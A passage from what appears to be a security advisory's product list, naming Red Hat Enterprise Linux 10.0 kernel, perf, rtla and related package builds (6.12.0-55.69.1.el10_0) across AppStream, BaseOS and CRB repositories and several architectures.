"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
